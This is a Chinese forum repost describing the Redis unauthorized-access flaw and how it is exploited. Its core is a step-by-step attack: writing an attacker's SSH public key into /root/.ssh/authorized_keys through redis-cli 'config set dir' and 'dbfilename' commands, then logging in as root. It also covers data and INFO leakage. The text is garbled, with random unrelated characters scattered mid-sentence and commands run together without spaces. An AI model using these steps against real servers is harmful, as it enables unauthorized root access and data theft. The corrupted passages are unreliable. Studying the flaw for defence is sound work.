來源：http://bbs.ichunqiu.com/thread-9199-1-1.html?from=ch

漏洞概述Redis 默認情況下赔退，會綁定在 0.0.0.0:6379工育，這樣將會將Redis服務(wù)暴露到公網(wǎng)上，如果在沒有開啟認證的情況下朽寞，可以導(dǎo)致任意用戶在可以訪問目標服務(wù)器的情況下未授權(quán)訪問Redis以及讀取Redis的數(shù)據(jù)。攻擊者在未授權(quán)訪問Redis的情況下可以利用Redis的相關(guān)方法委造，可以成功將自己的公鑰寫入目標服務(wù)器的 /root/.ssh 文件夾的authotrized_keys 文件中挑宠，進而可以直接登錄目標服務(wù)器今妄。

漏洞描述Redis 安全模型的觀念是: “請不要將Redis暴露在公開網(wǎng)絡(luò)中, 因為讓不受信任的客戶接觸到Redis是非常危險的” 郑口。

Redis 作者之所以放棄解決未授權(quán)訪問導(dǎo)致的不安全性是因為, 99.99%使用Redis的場景都是在沙盒化的環(huán)境中, 為了0.01%的可能性增加安全規(guī)則的同時也增加了復(fù)雜性, 雖然這個問題的并不是不能解決的, 但是這在他的設(shè)計哲學(xué)中仍是不劃算的。

因為其他受信任用戶需要使用Redis或者因為運維人員的疏忽等原因盾鳞，部分Redis 綁定在0.0.0.0:6379犬性，并且沒有開啟認證（這是Redis的默認配置），如果沒有進行采用相關(guān)的策略腾仅，比如添加防火墻規(guī)則避免其他非信任來源ip訪問等乒裆，將會導(dǎo)致Redis服務(wù)直接暴露在公網(wǎng)上，導(dǎo)致其他用戶可以直接在非授權(quán)情況下直接訪問Redis服務(wù)并進行相關(guān)操作推励。

利用Redis自身的相關(guān)方法鹤耍，可以進行寫文件操作，攻擊者可以成功將自己的公鑰寫入目標服務(wù)器的 /root/.ssh 文件夾的authotrized_keys 文件中验辞，進而可以直接登錄目標服務(wù)器稿黄。

漏洞影響Redis 暴露在公網(wǎng)（即綁定在0.0.0.0:6379，目標IP公網(wǎng)可訪問）跌造，并且沒有開啟相關(guān)認證和添加相關(guān)安全策略情況下可受影響而導(dǎo)致被利用杆怕。

通過ZoomEye 的搜索結(jié)果顯示，有97700在公網(wǎng)可以直接訪問的Redis服務(wù)壳贪。

根據(jù) ZoomEye 最新于2015年11月12日0點探測結(jié)果顯示：

總的存在無驗證可直接利用 Redis 服務(wù)的目標全球有49099陵珍，其中中國有16477。其中被明著寫入crackit的违施，也就是已經(jīng)被黑的比例分別是全球65%（3.1萬）互纯，中國67.5%（1.1萬）。

1.1.? ? 漏洞分析與利用首先在本地生產(chǎn)公私鑰文件:

$ssh-keygen –t rsa

[AppleScript]純文本查看復(fù)制代碼

?

1

2

3然后將公鑰寫入foo.txt文件

$(echo-e"\n\n"; cat id_rsa.pub; echo-e"\n\n")>foo.txt再連接Redis寫入文件

$ cat foo.txt | redis-cli-h192.168.1.11-xsetcrackit$ redis-cli-h192.168.1.11$202.101.116.80:6379>configsetdir/root/.ssh/OK$202.101.116.80:6379>configgetdir1)"dir"2)"/root/.ssh"$202.101.116.80:6379>configsetdbfilename"authorized_keys"OK$192.168.1.11:6379>saveOK

這樣就可以成功的將自己的公鑰寫入/root/.ssh文件夾的authotrized_keys文件里醉拓，然后攻擊者直接執(zhí)行：

$ ssh –i??id_rsa [email]root@202.101.116.80[/email]即可遠程利用自己的私鑰登錄該服務(wù)器伟姐。

當(dāng)然，寫入的目錄不限于/root/.ssh 下的authorized_keys亿卤，也可以寫入用戶目錄愤兵，不過Redis很多以root權(quán)限運行，所以寫入root目錄下排吴，可以跳過猜用戶的步驟秆乳。

Redis 未授權(quán)的其他危害與利用數(shù)據(jù)庫數(shù)據(jù)泄露Redis 作為數(shù)據(jù)庫，保存著各種各樣的數(shù)據(jù)，如果存在未授權(quán)訪問的情況屹堰，將會導(dǎo)致數(shù)據(jù)的泄露肛冶，其中包含保存的用戶信息等

敏感信息泄露通過 Redis 的 INFO 命令, 可以查看服務(wù)器相關(guān)的參數(shù)和敏感信息, 為攻擊者的后續(xù)滲透做鋪墊

可以看到泄露了很多 Redis 服務(wù)器的信息, 有當(dāng)前 Redis 版本, 內(nèi)存運行狀態(tài), 服務(wù)端個數(shù)等等敏感信息。